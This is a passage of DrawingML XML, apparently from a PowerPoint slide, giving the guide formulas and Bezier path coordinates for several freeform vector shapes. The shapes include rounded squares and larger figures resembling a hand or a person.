                  <a:gd name="T11" fmla="*/ 0 h 24"/>
                  <a:gd name="T12" fmla="*/ 21 w 24"/>
                  <a:gd name="T13" fmla="*/ 0 h 24"/>
                  <a:gd name="T14" fmla="*/ 24 w 24"/>
                  <a:gd name="T15" fmla="*/ 4 h 24"/>
                  <a:gd name="T16" fmla="*/ 24 w 24"/>
                  <a:gd name="T17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4">
                    <a:moveTo>
                      <a:pt x="24" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="23"/>
                      <a:pt x="22" y="24"/>
                      <a:pt x="21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2" y="24"/>
                      <a:pt x="0" y="23"/>
                      <a:pt x="0" y="2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2" y="0"/>
                      <a:pt x="24" y="2"/>
                      <a:pt x="24" y="4"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="24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6" name="Freeform 577">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54518159-2E8F-4943-B450-887CC5F882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90190" y="13438285"/>
                <a:ext cx="76200" cy="76200"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 24 w 24"/>
                  <a:gd name="T1" fmla="*/ 21 h 24"/>
                  <a:gd name="T2" fmla="*/ 21 w 24"/>
                  <a:gd name="T3" fmla="*/ 24 h 24"/>
                  <a:gd name="T4" fmla="*/ 4 w 24"/>
                  <a:gd name="T5" fmla="*/ 24 h 24"/>
                  <a:gd name="T6" fmla="*/ 0 w 24"/>
                  <a:gd name="T7" fmla="*/ 21 h 24"/>
                  <a:gd name="T8" fmla="*/ 0 w 24"/>
                  <a:gd name="T9" fmla="*/ 4 h 24"/>
                  <a:gd name="T10" fmla="*/ 4 w 24"/>
                  <a:gd name="T11" fmla="*/ 0 h 24"/>
                  <a:gd name="T12" fmla="*/ 21 w 24"/>
                  <a:gd name="T13" fmla="*/ 0 h 24"/>
                  <a:gd name="T14" fmla="*/ 24 w 24"/>
                  <a:gd name="T15" fmla="*/ 4 h 24"/>
                  <a:gd name="T16" fmla="*/ 24 w 24"/>
                  <a:gd name="T17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4">
                    <a:moveTo>
                      <a:pt x="24" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="23"/>
                      <a:pt x="22" y="24"/>
                      <a:pt x="21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2" y="24"/>
                      <a:pt x="0" y="23"/>
                      <a:pt x="0" y="2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2" y="0"/>
                      <a:pt x="24" y="2"/>
                      <a:pt x="24" y="4"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="24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7" name="Freeform 578">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06E6A742-AF21-BA4C-BA22-FDAD38F872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59990" y="12663585"/>
                <a:ext cx="425450" cy="425450"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 134"/>
                  <a:gd name="T1" fmla="*/ 4 h 134"/>
                  <a:gd name="T2" fmla="*/ 4 w 134"/>
                  <a:gd name="T3" fmla="*/ 0 h 134"/>
                  <a:gd name="T4" fmla="*/ 130 w 134"/>
                  <a:gd name="T5" fmla="*/ 0 h 134"/>
                  <a:gd name="T6" fmla="*/ 134 w 134"/>
                  <a:gd name="T7" fmla="*/ 4 h 134"/>
                  <a:gd name="T8" fmla="*/ 134 w 134"/>
                  <a:gd name="T9" fmla="*/ 130 h 134"/>
                  <a:gd name="T10" fmla="*/ 130 w 134"/>
                  <a:gd name="T11" fmla="*/ 134 h 134"/>
                  <a:gd name="T12" fmla="*/ 4 w 134"/>
                  <a:gd name="T13" fmla="*/ 134 h 134"/>
                  <a:gd name="T14" fmla="*/ 0 w 134"/>
                  <a:gd name="T15" fmla="*/ 130 h 134"/>
                  <a:gd name="T16" fmla="*/ 0 w 134"/>
                  <a:gd name="T17" fmla="*/ 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4" h="134">
                    <a:moveTo>
                      <a:pt x="0" y="4"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2"/>
                      <a:pt x="2" y="0"/>
                      <a:pt x="4" y="0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132" y="0"/>
                      <a:pt x="134" y="2"/>
                      <a:pt x="134" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134" y="130"/>
                      <a:pt x="134" y="130"/>
                      <a:pt x="134" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134" y="132"/>
                      <a:pt x="132" y="134"/>
                      <a:pt x="130" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="134"/>
                      <a:pt x="4" y="134"/>
                      <a:pt x="4" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="134"/>
                      <a:pt x="0" y="132"/>
                      <a:pt x="0" y="130"/>
                    </a:cubicBez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8" name="Freeform 579">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5754C428-3727-7D4C-B92B-A8A6E74518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94940" y="12993785"/>
                <a:ext cx="76200" cy="76200"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 24 w 24"/>
                  <a:gd name="T1" fmla="*/ 21 h 24"/>
                  <a:gd name="T2" fmla="*/ 21 w 24"/>
                  <a:gd name="T3" fmla="*/ 24 h 24"/>
                  <a:gd name="T4" fmla="*/ 4 w 24"/>
                  <a:gd name="T5" fmla="*/ 24 h 24"/>
                  <a:gd name="T6" fmla="*/ 0 w 24"/>
                  <a:gd name="T7" fmla="*/ 21 h 24"/>
                  <a:gd name="T8" fmla="*/ 0 w 24"/>
                  <a:gd name="T9" fmla="*/ 4 h 24"/>
                  <a:gd name="T10" fmla="*/ 4 w 24"/>
                  <a:gd name="T11" fmla="*/ 0 h 24"/>
                  <a:gd name="T12" fmla="*/ 21 w 24"/>
                  <a:gd name="T13" fmla="*/ 0 h 24"/>
                  <a:gd name="T14" fmla="*/ 24 w 24"/>
                  <a:gd name="T15" fmla="*/ 4 h 24"/>
                  <a:gd name="T16" fmla="*/ 24 w 24"/>
                  <a:gd name="T17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4">
                    <a:moveTo>
                      <a:pt x="24" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="23"/>
                      <a:pt x="22" y="24"/>
                      <a:pt x="21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2" y="24"/>
                      <a:pt x="0" y="23"/>
                      <a:pt x="0" y="2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2" y="0"/>
                      <a:pt x="24" y="2"/>
                      <a:pt x="24" y="4"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="24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9" name="Freeform 580">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7A7B0C6-67F9-2D44-B26E-2CEC12F6E9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99690" y="12993785"/>
                <a:ext cx="76200" cy="76200"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 24 w 24"/>
                  <a:gd name="T1" fmla="*/ 21 h 24"/>
                  <a:gd name="T2" fmla="*/ 21 w 24"/>
                  <a:gd name="T3" fmla="*/ 24 h 24"/>
                  <a:gd name="T4" fmla="*/ 4 w 24"/>
                  <a:gd name="T5" fmla="*/ 24 h 24"/>
                  <a:gd name="T6" fmla="*/ 0 w 24"/>
                  <a:gd name="T7" fmla="*/ 21 h 24"/>
                  <a:gd name="T8" fmla="*/ 0 w 24"/>
                  <a:gd name="T9" fmla="*/ 4 h 24"/>
                  <a:gd name="T10" fmla="*/ 4 w 24"/>
                  <a:gd name="T11" fmla="*/ 0 h 24"/>
                  <a:gd name="T12" fmla="*/ 21 w 24"/>
                  <a:gd name="T13" fmla="*/ 0 h 24"/>
                  <a:gd name="T14" fmla="*/ 24 w 24"/>
                  <a:gd name="T15" fmla="*/ 4 h 24"/>
                  <a:gd name="T16" fmla="*/ 24 w 24"/>
                  <a:gd name="T17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4">
                    <a:moveTo>
                      <a:pt x="24" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="23"/>
                      <a:pt x="22" y="24"/>
                      <a:pt x="21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2" y="24"/>
                      <a:pt x="0" y="23"/>
                      <a:pt x="0" y="2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2" y="0"/>
                      <a:pt x="24" y="2"/>
                      <a:pt x="24" y="4"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="24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0" name="Freeform 581">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DEF239D-4A02-9040-9CF5-D690637630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90190" y="12993785"/>
                <a:ext cx="76200" cy="76200"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 24 w 24"/>
                  <a:gd name="T1" fmla="*/ 21 h 24"/>
                  <a:gd name="T2" fmla="*/ 21 w 24"/>
                  <a:gd name="T3" fmla="*/ 24 h 24"/>
                  <a:gd name="T4" fmla="*/ 4 w 24"/>
                  <a:gd name="T5" fmla="*/ 24 h 24"/>
                  <a:gd name="T6" fmla="*/ 0 w 24"/>
                  <a:gd name="T7" fmla="*/ 21 h 24"/>
                  <a:gd name="T8" fmla="*/ 0 w 24"/>
                  <a:gd name="T9" fmla="*/ 4 h 24"/>
                  <a:gd name="T10" fmla="*/ 4 w 24"/>
                  <a:gd name="T11" fmla="*/ 0 h 24"/>
                  <a:gd name="T12" fmla="*/ 21 w 24"/>
                  <a:gd name="T13" fmla="*/ 0 h 24"/>
                  <a:gd name="T14" fmla="*/ 24 w 24"/>
                  <a:gd name="T15" fmla="*/ 4 h 24"/>
                  <a:gd name="T16" fmla="*/ 24 w 24"/>
                  <a:gd name="T17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4">
                    <a:moveTo>
                      <a:pt x="24" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="23"/>
                      <a:pt x="22" y="24"/>
                      <a:pt x="21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2" y="24"/>
                      <a:pt x="0" y="23"/>
                      <a:pt x="0" y="2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2" y="0"/>
                      <a:pt x="24" y="2"/>
                      <a:pt x="24" y="4"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="24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1" name="Freeform 627">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25FEE226-3698-8545-AC43-6E9E43BF0F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63065" y="12876311"/>
                <a:ext cx="304800" cy="663575"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 69 w 96"/>
                  <a:gd name="T1" fmla="*/ 177 h 209"/>
                  <a:gd name="T2" fmla="*/ 45 w 96"/>
                  <a:gd name="T3" fmla="*/ 162 h 209"/>
                  <a:gd name="T4" fmla="*/ 54 w 96"/>
                  <a:gd name="T5" fmla="*/ 111 h 209"/>
                  <a:gd name="T6" fmla="*/ 42 w 96"/>
                  <a:gd name="T7" fmla="*/ 0 h 209"/>
                  <a:gd name="T8" fmla="*/ 27 w 96"/>
                  <a:gd name="T9" fmla="*/ 60 h 209"/>
                  <a:gd name="T10" fmla="*/ 0 w 96"/>
                  <a:gd name="T11" fmla="*/ 115 h 209"/>
                  <a:gd name="T12" fmla="*/ 2 w 96"/>
                  <a:gd name="T13" fmla="*/ 119 h 209"/>
                  <a:gd name="T14" fmla="*/ 8 w 96"/>
                  <a:gd name="T15" fmla="*/ 172 h 209"/>
                  <a:gd name="T16" fmla="*/ 1 w 96"/>
                  <a:gd name="T17" fmla="*/ 192 h 209"/>
                  <a:gd name="T18" fmla="*/ 32 w 96"/>
                  <a:gd name="T19" fmla="*/ 208 h 209"/>
                  <a:gd name="T20" fmla="*/ 69 w 96"/>
                  <a:gd name="T21" fmla="*/ 208 h 209"/>
                  <a:gd name="T22" fmla="*/ 96 w 96"/>
                  <a:gd name="T23" fmla="*/ 201 h 209"/>
                  <a:gd name="T24" fmla="*/ 69 w 96"/>
                  <a:gd name="T25" fmla="*/ 177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6" h="209">
                    <a:moveTo>
                      <a:pt x="69" y="177"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="178"/>
                      <a:pt x="43" y="180"/>
                      <a:pt x="45" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="141"/>
                      <a:pt x="53" y="128"/>
                      <a:pt x="54" y="111"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="88"/>
                      <a:pt x="52" y="34"/>
                      <a:pt x="42" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="18"/>
                      <a:pt x="34" y="38"/>
                      <a:pt x="27" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="87"/>
                      <a:pt x="8" y="104"/>
                      <a:pt x="0" y="115"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="116"/>
                      <a:pt x="1" y="118"/>
                      <a:pt x="2" y="119"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="150"/>
                      <a:pt x="11" y="161"/>
                      <a:pt x="8" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="182"/>
                      <a:pt x="1" y="181"/>
                      <a:pt x="1" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="208"/>
                      <a:pt x="18" y="208"/>
                      <a:pt x="32" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="208"/>
                      <a:pt x="52" y="208"/>
                      <a:pt x="69" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="208"/>
                      <a:pt x="96" y="209"/>
                      <a:pt x="96" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="189"/>
                      <a:pt x="86" y="176"/>
                      <a:pt x="69" y="177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2" name="Freeform 628">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E635B3B-7E8B-F746-84DB-6560F61C8D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99515" y="11828561"/>
                <a:ext cx="635000" cy="1708150"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 118 w 200"/>
                  <a:gd name="T1" fmla="*/ 279 h 538"/>
                  <a:gd name="T2" fmla="*/ 101 w 200"/>
                  <a:gd name="T3" fmla="*/ 243 h 538"/>
                  <a:gd name="T4" fmla="*/ 120 w 200"/>
                  <a:gd name="T5" fmla="*/ 225 h 538"/>
                  <a:gd name="T6" fmla="*/ 127 w 200"/>
                  <a:gd name="T7" fmla="*/ 224 h 538"/>
                  <a:gd name="T8" fmla="*/ 159 w 200"/>
                  <a:gd name="T9" fmla="*/ 242 h 538"/>
                  <a:gd name="T10" fmla="*/ 174 w 200"/>
                  <a:gd name="T11" fmla="*/ 253 h 538"/>
                  <a:gd name="T12" fmla="*/ 179 w 200"/>
                  <a:gd name="T13" fmla="*/ 252 h 538"/>
                  <a:gd name="T14" fmla="*/ 164 w 200"/>
                  <a:gd name="T15" fmla="*/ 218 h 538"/>
                  <a:gd name="T16" fmla="*/ 155 w 200"/>
                  <a:gd name="T17" fmla="*/ 183 h 538"/>
                  <a:gd name="T18" fmla="*/ 200 w 200"/>
                  <a:gd name="T19" fmla="*/ 100 h 538"/>
                  <a:gd name="T20" fmla="*/ 100 w 200"/>
                  <a:gd name="T21" fmla="*/ 0 h 538"/>
                  <a:gd name="T22" fmla="*/ 0 w 200"/>
                  <a:gd name="T23" fmla="*/ 100 h 538"/>
                  <a:gd name="T24" fmla="*/ 100 w 200"/>
                  <a:gd name="T25" fmla="*/ 200 h 538"/>
                  <a:gd name="T26" fmla="*/ 106 w 200"/>
                  <a:gd name="T27" fmla="*/ 200 h 538"/>
                  <a:gd name="T28" fmla="*/ 112 w 200"/>
                  <a:gd name="T29" fmla="*/ 215 h 538"/>
                  <a:gd name="T30" fmla="*/ 100 w 200"/>
                  <a:gd name="T31" fmla="*/ 305 h 538"/>
                  <a:gd name="T32" fmla="*/ 93 w 200"/>
                  <a:gd name="T33" fmla="*/ 374 h 538"/>
                  <a:gd name="T34" fmla="*/ 80 w 200"/>
                  <a:gd name="T35" fmla="*/ 434 h 538"/>
                  <a:gd name="T36" fmla="*/ 62 w 200"/>
                  <a:gd name="T37" fmla="*/ 475 h 538"/>
                  <a:gd name="T38" fmla="*/ 70 w 200"/>
                  <a:gd name="T39" fmla="*/ 509 h 538"/>
                  <a:gd name="T40" fmla="*/ 112 w 200"/>
                  <a:gd name="T41" fmla="*/ 537 h 538"/>
                  <a:gd name="T42" fmla="*/ 139 w 200"/>
                  <a:gd name="T43" fmla="*/ 530 h 538"/>
                  <a:gd name="T44" fmla="*/ 113 w 200"/>
                  <a:gd name="T45" fmla="*/ 506 h 538"/>
                  <a:gd name="T46" fmla="*/ 110 w 200"/>
                  <a:gd name="T47" fmla="*/ 473 h 538"/>
                  <a:gd name="T48" fmla="*/ 167 w 200"/>
                  <a:gd name="T49" fmla="*/ 388 h 538"/>
                  <a:gd name="T50" fmla="*/ 184 w 200"/>
                  <a:gd name="T51" fmla="*/ 302 h 538"/>
                  <a:gd name="T52" fmla="*/ 184 w 200"/>
                  <a:gd name="T53" fmla="*/ 302 h 538"/>
                  <a:gd name="T54" fmla="*/ 118 w 200"/>
                  <a:gd name="T55" fmla="*/ 279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0" h="538">
                    <a:moveTo>
                      <a:pt x="118" y="279"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="269"/>
                      <a:pt x="99" y="255"/>
                      <a:pt x="101" y="243"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="234"/>
                      <a:pt x="110" y="228"/>
                      <a:pt x="120" y="225"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="225"/>
                      <a:pt x="125" y="224"/>
                      <a:pt x="127" y="224"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="224"/>
                      <a:pt x="150" y="234"/>
                      <a:pt x="159" y="242"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="164" y="248"/>
                      <a:pt x="170" y="253"/>
                      <a:pt x="174" y="253"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="253"/>
                      <a:pt x="177" y="253"/>
                      <a:pt x="179" y="252"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="238"/>
                      <a:pt x="170" y="226"/>
                      <a:pt x="164" y="218"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="156" y="206"/>
                      <a:pt x="155" y="193"/>
                      <a:pt x="155" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="182" y="165"/>
                      <a:pt x="200" y="135"/>
                      <a:pt x="200" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="200" y="44"/>
                      <a:pt x="155" y="0"/>
                      <a:pt x="100" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="0"/>
                      <a:pt x="0" y="44"/>
                      <a:pt x="0" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="155"/>
                      <a:pt x="45" y="200"/>
                      <a:pt x="100" y="200"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="200"/>
                      <a:pt x="104" y="200"/>
                      <a:pt x="106" y="200"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="205"/>
                      <a:pt x="119" y="210"/>
                      <a:pt x="112" y="215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="226"/>
                      <a:pt x="85" y="248"/>
                      <a:pt x="100" y="305"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="345"/>
                      <a:pt x="93" y="346"/>
                      <a:pt x="93" y="374"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="405"/>
                      <a:pt x="81" y="413"/>
                      <a:pt x="80" y="434"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="478"/>
                      <a:pt x="71" y="468"/>
                      <a:pt x="62" y="475"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="485"/>
                      <a:pt x="61" y="498"/>
                      <a:pt x="70" y="509"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="519"/>
                      <a:pt x="95" y="537"/>
                      <a:pt x="112" y="537"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="537"/>
                      <a:pt x="139" y="538"/>
                      <a:pt x="139" y="530"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="518"/>
                      <a:pt x="130" y="507"/>
                      <a:pt x="113" y="506"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="506"/>
                      <a:pt x="96" y="487"/>
                      <a:pt x="110" y="473"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="129" y="454"/>
                      <a:pt x="145" y="450"/>
                      <a:pt x="167" y="388"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="178" y="356"/>
                      <a:pt x="183" y="327"/>
                      <a:pt x="184" y="302"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="184" y="302"/>
                      <a:pt x="184" y="302"/>
                      <a:pt x="184" y="302"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="169" y="302"/>
                      <a:pt x="134" y="292"/>
                      <a:pt x="118" y="279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3" name="Freeform 629">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5963042-1A0B-C34C-A9EB-2E2D09B7DE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13840" y="12374661"/>
                <a:ext cx="600075" cy="393700"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 180 w 189"/>
                  <a:gd name="T1" fmla="*/ 34 h 124"/>
                  <a:gd name="T2" fmla="*/ 166 w 189"/>
                  <a:gd name="T3" fmla="*/ 44 h 124"/>
                  <a:gd name="T4" fmla="*/ 165 w 189"/>
                  <a:gd name="T5" fmla="*/ 43 h 124"/>
                  <a:gd name="T6" fmla="*/ 184 w 189"/>
                  <a:gd name="T7" fmla="*/ 27 h 124"/>
                  <a:gd name="T8" fmla="*/ 179 w 189"/>
                  <a:gd name="T9" fmla="*/ 21 h 124"/>
                  <a:gd name="T10" fmla="*/ 160 w 189"/>
                  <a:gd name="T11" fmla="*/ 37 h 124"/>
                  <a:gd name="T12" fmla="*/ 159 w 189"/>
                  <a:gd name="T13" fmla="*/ 36 h 124"/>
                  <a:gd name="T14" fmla="*/ 178 w 189"/>
                  <a:gd name="T15" fmla="*/ 17 h 124"/>
                  <a:gd name="T16" fmla="*/ 173 w 189"/>
                  <a:gd name="T17" fmla="*/ 11 h 124"/>
                  <a:gd name="T18" fmla="*/ 153 w 189"/>
                  <a:gd name="T19" fmla="*/ 30 h 124"/>
                  <a:gd name="T20" fmla="*/ 152 w 189"/>
                  <a:gd name="T21" fmla="*/ 29 h 124"/>
                  <a:gd name="T22" fmla="*/ 169 w 189"/>
                  <a:gd name="T23" fmla="*/ 10 h 124"/>
                  <a:gd name="T24" fmla="*/ 163 w 189"/>
                  <a:gd name="T25" fmla="*/ 5 h 124"/>
                  <a:gd name="T26" fmla="*/ 145 w 189"/>
                  <a:gd name="T27" fmla="*/ 25 h 124"/>
                  <a:gd name="T28" fmla="*/ 134 w 189"/>
                  <a:gd name="T29" fmla="*/ 35 h 124"/>
                  <a:gd name="T30" fmla="*/ 131 w 189"/>
                  <a:gd name="T31" fmla="*/ 32 h 124"/>
                  <a:gd name="T32" fmla="*/ 135 w 189"/>
                  <a:gd name="T33" fmla="*/ 17 h 124"/>
                  <a:gd name="T34" fmla="*/ 127 w 189"/>
                  <a:gd name="T35" fmla="*/ 13 h 124"/>
                  <a:gd name="T36" fmla="*/ 119 w 189"/>
                  <a:gd name="T37" fmla="*/ 35 h 124"/>
                  <a:gd name="T38" fmla="*/ 109 w 189"/>
                  <a:gd name="T39" fmla="*/ 59 h 124"/>
                  <a:gd name="T40" fmla="*/ 76 w 189"/>
                  <a:gd name="T41" fmla="*/ 87 h 124"/>
                  <a:gd name="T42" fmla="*/ 23 w 189"/>
                  <a:gd name="T43" fmla="*/ 59 h 124"/>
                  <a:gd name="T44" fmla="*/ 23 w 189"/>
                  <a:gd name="T45" fmla="*/ 102 h 124"/>
                  <a:gd name="T46" fmla="*/ 86 w 189"/>
                  <a:gd name="T47" fmla="*/ 124 h 124"/>
                  <a:gd name="T48" fmla="*/ 133 w 189"/>
                  <a:gd name="T49" fmla="*/ 75 h 124"/>
                  <a:gd name="T50" fmla="*/ 153 w 189"/>
                  <a:gd name="T51" fmla="*/ 65 h 124"/>
                  <a:gd name="T52" fmla="*/ 171 w 189"/>
                  <a:gd name="T53" fmla="*/ 51 h 124"/>
                  <a:gd name="T54" fmla="*/ 184 w 189"/>
                  <a:gd name="T55" fmla="*/ 41 h 124"/>
                  <a:gd name="T56" fmla="*/ 180 w 189"/>
                  <a:gd name="T57" fmla="*/ 3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" h="124">
                    <a:moveTo>
                      <a:pt x="180" y="34"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="180" y="34"/>
                      <a:pt x="168" y="43"/>
                      <a:pt x="166" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="165" y="45"/>
                      <a:pt x="164" y="44"/>
                      <a:pt x="165" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="166" y="42"/>
                      <a:pt x="184" y="27"/>
                      <a:pt x="184" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="188" y="24"/>
                      <a:pt x="183" y="17"/>
                      <a:pt x="179" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="21"/>
                      <a:pt x="161" y="36"/>
                      <a:pt x="160" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="38"/>
                      <a:pt x="158" y="37"/>
                      <a:pt x="159" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="35"/>
                      <a:pt x="178" y="17"/>
                      <a:pt x="178" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="182" y="13"/>
                      <a:pt x="177" y="7"/>
                      <a:pt x="173" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="11"/>
                      <a:pt x="155" y="29"/>
                      <a:pt x="153" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="152" y="31"/>
                      <a:pt x="151" y="30"/>
                      <a:pt x="152" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="154" y="28"/>
                      <a:pt x="169" y="10"/>
                      <a:pt x="169" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="6"/>
                      <a:pt x="167" y="0"/>
                      <a:pt x="163" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="5"/>
                      <a:pt x="147" y="23"/>
                      <a:pt x="145" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="142" y="28"/>
                      <a:pt x="143" y="27"/>
                      <a:pt x="134" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="36"/>
                      <a:pt x="131" y="37"/>
                      <a:pt x="131" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="28"/>
                      <a:pt x="135" y="17"/>
                      <a:pt x="135" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="11"/>
                      <a:pt x="129" y="7"/>
                      <a:pt x="127" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="13"/>
                      <a:pt x="121" y="29"/>
                      <a:pt x="119" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="42"/>
                      <a:pt x="114" y="54"/>
                      <a:pt x="109" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="62"/>
                      <a:pt x="88" y="87"/>
                      <a:pt x="76" y="87"/>
                    </a:cubicBezTo>
